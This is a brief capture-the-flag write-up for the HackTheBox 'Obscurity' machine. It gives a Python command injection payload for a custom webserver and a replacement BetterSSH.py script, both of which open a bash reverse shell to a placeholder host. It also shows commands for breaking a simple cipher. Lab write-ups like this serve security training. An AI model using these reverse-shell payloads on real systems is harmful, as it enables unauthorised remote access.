Obscurity @ HackTheBox
Obscurity is a 30-point Linux machine on HackTheBox that involves exploiting a command injection in a custom webserver, breaking a simple cipher and abusing file system permissions to get root.
Notes
Command injection payload:
1
';__import__("os").system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")+'
Retrieving the key:
1
python3 SuperSecureCrypt.py -d -i out.txt -k "`cat check.txt`" -o key
Decrypting the ssh password:
1
python3 SuperSecureCrypt.py -d -i passwordreminder.txt -k alexandrovich -o /dev/shm/x
Replaced BetterSSH.py:
1
2
import os
os.system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")
This post is licensed under CC BY 4.0 by the author.